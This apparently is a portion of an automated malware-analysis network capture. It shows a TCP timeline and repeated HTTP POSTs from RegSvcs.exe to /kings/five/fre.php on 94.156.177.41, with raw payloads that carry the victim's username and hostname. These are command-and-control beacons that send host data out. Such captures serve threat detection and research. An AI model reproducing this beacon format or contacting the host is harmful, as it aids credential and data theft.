                                                                                  Dec 4, 2024 06:53:48.448434114 CET804991694.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:53:48.448606014 CET4991680192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:53:48.450506926 CET4991680192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:53:48.570583105 CET804991694.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:53:48.570672989 CET4991680192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:53:48.690646887 CET804991694.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:53:50.049144030 CET804991694.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:53:50.049273968 CET4991680192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:53:50.049289942 CET804991694.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:53:50.049438000 CET4991680192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:53:50.169203043 CET804991694.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:53:50.191236019 CET4992080192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:53:50.311161041 CET804992094.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:53:50.311254978 CET4992080192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:53:50.313322067 CET4992080192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:53:50.433358908 CET804992094.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:53:50.433425903 CET4992080192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:53:50.553534985 CET804992094.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:53:51.907574892 CET804992094.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:53:51.907713890 CET4992080192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:53:51.907804966 CET804992094.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:53:51.907859087 CET4992080192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:53:52.029212952 CET804992094.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:53:52.048917055 CET4992580192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:53:52.168911934 CET804992594.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:53:52.169006109 CET4992580192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:53:52.171034098 CET4992580192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:53:52.290919065 CET804992594.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:53:52.290981054 CET4992580192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:53:52.411546946 CET804992594.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:53:53.783016920 CET804992594.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:53:53.783032894 CET804992594.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:53:53.783128023 CET4992580192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:53:53.783247948 CET4992580192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:53:53.903101921 CET804992594.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:53:53.921848059 CET4993080192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:53:54.041788101 CET804993094.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:53:54.041886091 CET4993080192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:53:54.043678045 CET4993080192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:53:54.163580894 CET804993094.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:53:54.163772106 CET4993080192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:53:54.283730030 CET804993094.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:53:55.529705048 CET804993094.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:53:55.529844999 CET4993080192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:53:55.529939890 CET804993094.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:53:55.529994011 CET4993080192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:53:55.649894953 CET804993094.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:53:55.680267096 CET4993680192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:53:55.800288916 CET804993694.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:53:55.800488949 CET4993680192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:53:55.802531004 CET4993680192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:53:55.922564983 CET804993694.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:53:55.922616959 CET4993680192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:53:56.042634964 CET804993694.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:53:57.398612022 CET804993694.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:53:57.398715019 CET804993694.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:53:57.398751020 CET4993680192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:53:57.398772001 CET4993680192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:53:57.518639088 CET804993694.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:53:57.534785986 CET4994180192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:53:57.654716969 CET804994194.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:53:57.654793024 CET4994180192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:53:57.656769991 CET4994180192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:53:57.777391911 CET804994194.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:53:57.777455091 CET4994180192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:53:57.897670031 CET804994194.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:53:59.245382071 CET804994194.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:53:59.245393038 CET804994194.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:53:59.245469093 CET4994180192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:53:59.245511055 CET4994180192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:53:59.365408897 CET804994194.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:53:59.378396034 CET4994680192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:53:59.498394966 CET804994694.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:53:59.498491049 CET4994680192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:53:59.500483036 CET4994680192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:53:59.620393038 CET804994694.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:53:59.620459080 CET4994680192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:53:59.740367889 CET804994694.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:54:01.080385923 CET804994694.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:54:01.080485106 CET804994694.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:54:01.080502033 CET4994680192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:54:01.080558062 CET4994680192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:54:01.200592995 CET804994694.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:54:01.247687101 CET4995080192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:54:01.367851973 CET804995094.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:54:01.367959976 CET4995080192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:54:01.369982958 CET4995080192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:54:01.490621090 CET804995094.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:54:01.491744995 CET4995080192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:54:01.611668110 CET804995094.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:54:02.961114883 CET804995094.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:54:02.961210012 CET4995080192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:54:02.961275101 CET804995094.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:54:02.961322069 CET4995080192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:54:03.081113100 CET804995094.156.177.41192.168.2.4
                                                                                  • 94.156.177.41
                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.44973794.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:52:06.647583961 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 176
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:52:06.767642021 CET176OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: 'ckav.rujones549163JONES-PCk0FDD42EE188E931437F4FBE2CcdaTQ
                                                                                  Dec 4, 2024 06:52:08.289335012 CET185INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:52:08 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.44973894.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:52:08.575700045 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 176
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:52:08.695715904 CET176OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: 'ckav.rujones549163JONES-PC+0FDD42EE188E931437F4FBE2CzSjPa
                                                                                  Dec 4, 2024 06:52:10.175102949 CET185INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:52:09 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.2.44973994.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:52:10.358481884 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:52:10.478754044 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:52:11.901484966 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:52:11 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  3192.168.2.44974094.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:52:12.175564051 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:52:12.295748949 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:52:13.773469925 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:52:13 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  4192.168.2.44974194.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:52:14.043212891 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:52:14.164338112 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:52:15.532588005 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:52:15 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  5192.168.2.44974394.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:52:15.818129063 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:52:15.938258886 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:52:17.218137980 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:52:16 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  6192.168.2.44974694.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:52:17.537750006 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:52:17.657826900 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:52:19.025707006 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:52:18 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  7192.168.2.44975094.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:52:19.285294056 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:52:19.405358076 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:52:20.880343914 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:52:20 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  8192.168.2.44975294.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:52:21.141326904 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:52:21.262165070 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:52:22.682821035 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:52:22 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  9192.168.2.44975494.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:52:22.952970982 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:52:23.073188066 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:52:24.551582098 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:52:24 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  10192.168.2.44975694.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:52:24.812109947 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:52:24.932097912 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:52:26.402652979 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:52:26 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  11192.168.2.44975794.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:52:26.673463106 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:52:26.793786049 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:52:28.258573055 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:52:28 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  12192.168.2.44975994.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:52:28.517987013 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:52:28.638241053 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:52:30.177768946 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:52:29 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


